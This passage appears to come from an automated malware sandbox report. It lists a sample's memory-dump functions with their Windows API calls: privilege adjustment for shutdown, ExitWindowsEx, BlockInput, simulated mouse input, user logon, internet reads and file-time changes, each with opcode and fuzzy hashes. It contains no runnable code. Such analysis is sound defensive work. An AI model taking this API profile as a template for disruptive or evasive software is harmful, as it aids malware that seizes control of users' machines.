                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Oa=$VUUU$VUUU$VUUU$VUUU
                                                    • API String ID: 0-3026953777
                                                    • Opcode ID: d7004cd4063938dbc4cf915b1ff0754398969bad72fd997f3eb0a0ac9ab2a369
                                                    • Instruction ID: 642691038c63d8930636e9263cd4f46344aca1aefe9f98ccfb28d89f19bf191c
                                                    • Opcode Fuzzy Hash: d7004cd4063938dbc4cf915b1ff0754398969bad72fd997f3eb0a0ac9ab2a369
                                                    • Instruction Fuzzy Hash: 01629E71E0411ACBCF29CF58D9907AEB3B1AF51304F2581ABD85AB7780E734AE81DB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00418CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00418D0D
                                                      • Part of subcall function 00418CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
                                                      • Part of subcall function 00418CC3: GetLastError.KERNEL32 ref: 00418D47
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0042549B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2234035333-3733053543
                                                    • Opcode ID: 8f9aac4aa79f2a06f4cbc26f5163acbe278cf29bb798a6673bf1e9d0d09cbfa5
                                                    • Instruction ID: c1e372983c4700dd9801547a2fac3aa486a467a2465d9c71078b34865a75502c
                                                    • Opcode Fuzzy Hash: 8f9aac4aa79f2a06f4cbc26f5163acbe278cf29bb798a6673bf1e9d0d09cbfa5
                                                    • Instruction Fuzzy Hash: DD01D272355A253DF6287664BC4AFFBB72CEB01363FA00427F806D00C2D569188081AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00401D88,?), ref: 0043C312
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043C324
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 5a4dc7d1fa5f9ed58ae4f85198771b78a3a1ba3a1924cb8dbbb63efa9f75688a
                                                    • Instruction ID: 070a20d092311d02ac2c0ac9ea37a3ed7ee20b0336b6cfe06a524fe9f59f22d8
                                                    • Opcode Fuzzy Hash: 5a4dc7d1fa5f9ed58ae4f85198771b78a3a1ba3a1924cb8dbbb63efa9f75688a
                                                    • Instruction Fuzzy Hash: 5FE08CB8200703CEDB205F25D848B9BBAD4EF0D355F90C43AE889D1610E338E844CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 0-2761157908
                                                    • Opcode ID: dffccdb607b34a191a0fe4b56cad457843b0f93aaa388e2f3352f195ec557026
                                                    • Instruction ID: 88b565f29de650776d70a509658444c59ba6826edd2a646e9a4b54ca4799ccb0
                                                    • Opcode Fuzzy Hash: dffccdb607b34a191a0fe4b56cad457843b0f93aaa388e2f3352f195ec557026
                                                    • Instruction Fuzzy Hash: 83626BB6E0061E8FDB25CFA8C8406BDBBB5FF58310F26812AD949EB341D7749942CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 004326D5
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0043270C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: e0dc0e4914a176aa9fc54fa3a600c49c8edabc8969c3fb64f334d7a96c09947d
                                                    • Instruction ID: e86b0893cfaadfbd345405e452c2e2e169ad2694946ff4c283b091629f40e40b
                                                    • Opcode Fuzzy Hash: e0dc0e4914a176aa9fc54fa3a600c49c8edabc8969c3fb64f334d7a96c09947d
                                                    • Instruction Fuzzy Hash: 6041F876500209BFEB219B95DE86EFF77BCFF48368F10502BF201A5140D7B99E419668
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042BF51
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0042BFA7
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0042BFD7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: 692ec0c438157e7c2c12e46f81676904744cd6d27c2ef367ecaf030c6d1591e5
                                                    • Instruction ID: 0f442c5f246a324d36e7aaa3c6c0d5f946e3993beeb929cd63a704fca7e33b4c
                                                    • Opcode Fuzzy Hash: 692ec0c438157e7c2c12e46f81676904744cd6d27c2ef367ecaf030c6d1591e5
                                                    • Instruction Fuzzy Hash: 4B51AA35604622CFC714DF68D890EAAB3E4EF09320F51466EE95ACB3A1DB34ED05CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042B5AE
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0042B608
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0042B655
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 6d30b508437889f3b90437896a7510081b590facf1fa06bb63f9066f1ddeb000
                                                    • Instruction ID: baa475a67986a17f4289de25f9a6685493a9b3b201ddc69624dcc89f0574daea
                                                    • Opcode Fuzzy Hash: 6d30b508437889f3b90437896a7510081b590facf1fa06bb63f9066f1ddeb000
                                                    • Instruction Fuzzy Hash: 3C218E35A00518EFCB00EF65D884EAEBBB8FF49310F0580AAE805EB351CB31AD55CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00418D0D
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
                                                    • GetLastError.KERNEL32 ref: 00418D47
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                    • String ID:
                                                    • API String ID: 4244140340-0
                                                    • Opcode ID: 5dc32a1ff16ef603dee56b768e80dc2f453114d684ab5c549b91bbb998b60c7a
                                                    • Instruction ID: 69ad3ab947fb5c5746c53e4b4f7773ab80df30c21f0cc6dcf5ee692af4a1ec79
                                                    • Opcode Fuzzy Hash: 5dc32a1ff16ef603dee56b768e80dc2f453114d684ab5c549b91bbb998b60c7a
                                                    • Instruction Fuzzy Hash: 8911C1B2514309BFE728DF55EC86DABBBBCEB41360710852EF04696641DB31B881CA34
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000,00000000,?,0044FAC0,?,\\.\,0044F910), ref: 0042404B
                                                    • DeviceIoControl.KERNEL32 ref: 00424088
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424091
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: a609354ae87eb5542f919b641263b3cd3092e6ff7b320ac011069a1124a9187e
                                                    • Instruction ID: 6851aab4001bca241d10ac467614850652a6b1fbd32df005198efbaa4f69103f
                                                    • Opcode Fuzzy Hash: a609354ae87eb5542f919b641263b3cd3092e6ff7b320ac011069a1124a9187e
                                                    • Instruction Fuzzy Hash: F51182B2A00238BEE7109BE8EC44FBFBBBCDB45764F100157FA04E6190C2795D4587A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74B5F8A0,00000000,00000000,?,0042F3C6,?), ref: 004245DC
                                                    • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,0042F3C6,?), ref: 00424604
                                                    • CloseHandle.KERNEL32(00000000,?,0042F3C6,?), ref: 0042460B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 370079f8198e46089e6ddcab000747a7e4fe64c2f331fe1288aff6d36dac2082
                                                    • Instruction ID: 7f444a059210e33265e4877fc35cfcdda5bfb3187113c0e9749b6e8b4ade3733
                                                    • Opcode Fuzzy Hash: 370079f8198e46089e6ddcab000747a7e4fe64c2f331fe1288aff6d36dac2082
                                                    • Instruction Fuzzy Hash: 8CF05EB5204129BAF9201A55BCC8EB72B6CEBC37ADF504137F61554080816A0D8A9679
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,?,?,?,?,?,?,?), ref: 00424C2C
                                                    • CheckTokenMembership.ADVAPI32(?,?,?,?,?,?,?,?,?,?), ref: 00424C43
                                                    • FreeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 00424C53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 139de2df8180d064c5a86ce1a38b911b9830103fe4650729160053fc3d22ee91
                                                    • Instruction ID: cc69ed9c6a8bfef9c4e56b50c4f458e24979712ee4933f053885909acc3091cc
                                                    • Opcode Fuzzy Hash: 139de2df8180d064c5a86ce1a38b911b9830103fe4650729160053fc3d22ee91
                                                    • Instruction Fuzzy Hash: 16F04975A5120CBBDF04CFF4ED89EBEBBBCEB49251F00447AE502E2181D6756A088B14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042C966
                                                    • FindClose.KERNEL32(00000000), ref: 0042C996
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: fe72dcdf0828880a8f1eeb8b8e7f9d06980bf10cd4f46d74d5eac09fe99c8a58
                                                    • Instruction ID: 9bb8c43c10a4300acc5ec8c2b538c3392c194e25b06cd2a4d9a63aa6fabf105f
                                                    • Opcode Fuzzy Hash: fe72dcdf0828880a8f1eeb8b8e7f9d06980bf10cd4f46d74d5eac09fe99c8a58
                                                    • Instruction Fuzzy Hash: B211A1766006109FD710EF29D849E2AF7E9FF85324F01851EF8A9DB291DB74AC05CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0043977D,?,00000000,?,00000016,?,00000016), ref: 0042A302
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0043977D,?,00000000,?,00000016,?,00000016), ref: 0042A314
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 4701063ffb6576ba01815b53b5c18ebc8800374edf3db1f5336fb5dea52f1d2b
                                                    • Instruction ID: 3c0c97d0011a5aa2711b8c2707fa1fe341e4b01eb60ad82b6d63c42afb0a128e
                                                    • Opcode Fuzzy Hash: 4701063ffb6576ba01815b53b5c18ebc8800374edf3db1f5336fb5dea52f1d2b
                                                    • Instruction Fuzzy Hash: 7BF0E23524422DFBDB119FA0DC48FFA7B2CFF0A3A1F008266F90896180C6319904CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00418AEE), ref: 00418728
                                                    • CloseHandle.KERNEL32(?,00000000,00418AEE), ref: 0041873A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 3b3e405732a122a5cea87cc1dd7511e5bc214fa3c7396ef36cc21e2c528559d5
                                                    • Instruction ID: 6eca260d919a7b4fdc7626ceed49c47aab2b5f36f4e8b35b939c3392bf08937c
                                                    • Opcode Fuzzy Hash: 3b3e405732a122a5cea87cc1dd7511e5bc214fa3c7396ef36cc21e2c528559d5
                                                    • Instruction Fuzzy Hash: D4E0EC76010650EFE7662B61ED09D77BBE9EF04750724893DF896848B0DB72ACD0DB14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003E8F97,?,?,?,00000001), ref: 003EA39A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003EA3A3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                                                    • Instruction ID: 1aeab84b04b5fd839ea3c868517153fc16cdcb227ff799a0a3a830f765568ef9
                                                    • Opcode Fuzzy Hash: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                                                    • Instruction Fuzzy Hash: 66B09235054208ABCA002F91EC09F883F68EB46AA2F404030FA0D84C60CB6254548A99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Oa=
                                                    • API String ID: 0-2684945688
                                                    • Opcode ID: b4cb64943529b73246322472cb611c72636f4291f064f0104d63ca63433e5bfe
                                                    • Instruction ID: d9342541c771588430226760116d76e1ab82f6c75bfab693f80100cbfdb34297
                                                    • Opcode Fuzzy Hash: b4cb64943529b73246322472cb611c72636f4291f064f0104d63ca63433e5bfe
                                                    • Instruction Fuzzy Hash: 472268725083019FD726DF24D881B6AB7E5AF85304F01492EF89A9B391DB74EE44CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF,?,?,003ECAA7,?,?,?,?,?,?,00000000), ref: 003ECF8C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 132acc8479a1063e09d408fbb31d041e9ca64cf7d98d2dc3a202905e225e2f35
                                                    • Instruction ID: 701c1e664505858d2dce8e418fe9feadeda16841b1d45efb599dc408209f5363
                                                    • Opcode Fuzzy Hash: 132acc8479a1063e09d408fbb31d041e9ca64cf7d98d2dc3a202905e225e2f35
                                                    • Instruction Fuzzy Hash: D0B13B31220658DFD716CF29C486B697BE1FF45365F2A8658E899CF2E1C335E982CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00434218
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 0a2f4df9e0c4c82e14cbe07ecb322c65b8d502b6d26a6692995ed90e72dab3df
                                                    • Instruction ID: 291fb830071cb073cab2540e0064a044fa0e2843665099bdccd0abeea42dd89d
                                                    • Opcode Fuzzy Hash: 0a2f4df9e0c4c82e14cbe07ecb322c65b8d502b6d26a6692995ed90e72dab3df
                                                    • Instruction Fuzzy Hash: 19E012352401149FC7109F59D444F9BB7D8AF987A0F01806AFC49DB351DA74BC418B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: 9871f6d2591a1294a9a9edfeb6fe0b15f3fd77dd74a5592ab2332973f226696a
                                                    • Instruction ID: bbbd9e01fbd8a84c3d253a0c55c6f66d34f05c7b28f9c529f6b864a4a71e84a0
                                                    • Opcode Fuzzy Hash: 9871f6d2591a1294a9a9edfeb6fe0b15f3fd77dd74a5592ab2332973f226696a
                                                    • Instruction Fuzzy Hash: CED05EA836062479FC181B24BC5FF770108F384795FD2028BB101C91C2D8D86D559439
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,?,?,00000001,00000000,?), ref: 00418CB3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: f457a3adbd5c890a8f394e60b679407b65feab58f857b693492377955c6717df
                                                    • Instruction ID: 53f14dcc251a7eb8441ed263c75b83ad5bdfd40c0ad7593a97bf0553ab5b52e0
                                                    • Opcode Fuzzy Hash: f457a3adbd5c890a8f394e60b679407b65feab58f857b693492377955c6717df
                                                    • Instruction Fuzzy Hash: F9D0173229040EABEF018EA4EC01EBF3B69EB01701F408111FA15C50A0C676D425AB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00402242
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 0b04e0751ddabe29c9b8e36264e72f089b0c7f96b36b51a3ea01a2405aeec12b
                                                    • Instruction ID: 22d19b965a8867e2fb886a0a4b0df2e9f535af2a5ab63cdd885e47f7cee3739e
                                                    • Opcode Fuzzy Hash: 0b04e0751ddabe29c9b8e36264e72f089b0c7f96b36b51a3ea01a2405aeec12b
                                                    • Instruction Fuzzy Hash: BFC048F5800109DBDB15DBA0DA88DEEB7BCAB08304F2040A6A102F2150E778AB488A76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
